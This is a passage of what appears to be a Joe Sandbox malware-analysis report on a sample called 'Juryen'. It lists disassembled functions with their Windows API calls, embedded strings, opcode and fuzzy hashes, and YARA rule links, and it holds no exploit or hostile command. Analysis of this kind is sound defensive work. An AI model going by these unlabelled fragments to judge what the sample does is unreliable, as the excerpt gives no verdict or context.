                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                    • String ID: General
                                                                    • API String ID: 999786162-26480598
                                                                    • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                    • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                    Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                    • _snwprintf.MSVCRT ref: 0040977D
                                                                    • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                    • String ID: Error$Error %d: %s
                                                                    • API String ID: 313946961-1552265934
                                                                    • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                    • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                    Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                    • API String ID: 0-1953309616
                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                    Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                    • API String ID: 3510742995-272990098
                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                    Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: gj
                                                                    • API String ID: 1297977491-4203073231
                                                                    • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                    • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                    Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                    • free.MSVCRT ref: 0040E9D3
                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$free
                                                                    • String ID:
                                                                    • API String ID: 2241099983-0
                                                                    • Opcode ID: 5bf7d1a6be3c7450b3871e5cd35d64ffe6244b7c5c0165dc5567eb6e33e5d2a7
                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                    • Opcode Fuzzy Hash: 5bf7d1a6be3c7450b3871e5cd35d64ffe6244b7c5c0165dc5567eb6e33e5d2a7
                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                    Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                    • malloc.MSVCRT ref: 004174BD
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                    • free.MSVCRT ref: 004174E4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                    • String ID:
                                                                    • API String ID: 4053608372-0
                                                                    • Opcode ID: b0e2352a19f761283a872d87c69d2b5bb205fab1a5e12f8af4558502f69ded4d
                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                    • Opcode Fuzzy Hash: b0e2352a19f761283a872d87c69d2b5bb205fab1a5e12f8af4558502f69ded4d
                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                    Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                    • String ID:
                                                                    • API String ID: 4247780290-0
                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                    Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                    • memset.MSVCRT ref: 004450CD
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                    • String ID:
                                                                    • API String ID: 1471605966-0
                                                                    • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                    • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                    Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                    • String ID: \StringFileInfo\
                                                                    • API String ID: 102104167-2245444037
                                                                    • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                    • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                    Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                    Function 00401942 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                    • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                    • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$PlacementWindow
                                                                    • String ID: AE
                                                                    • API String ID: 3548547718-685266089
                                                                    • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                    • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                    • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                    • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                    Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _memicmpwcslen
                                                                    • String ID: @@@@$History
                                                                    • API String ID: 1872909662-685208920
                                                                    • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                    • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                    Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004100FB
                                                                    • memset.MSVCRT ref: 00410112
                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                    • String ID: </%s>
                                                                    • API String ID: 3400436232-259020660
                                                                    • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                    • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                    Function 0040E758 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040E770
                                                                    • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendmemset
                                                                    • String ID: AE$"
                                                                    • API String ID: 568519121-1989281832
                                                                    • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                    • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                    Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D58D
                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                    • String ID: caption
                                                                    • API String ID: 1523050162-4135340389
                                                                    • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                    • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                    Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                    Strings
                                                                    Memory Dump Source
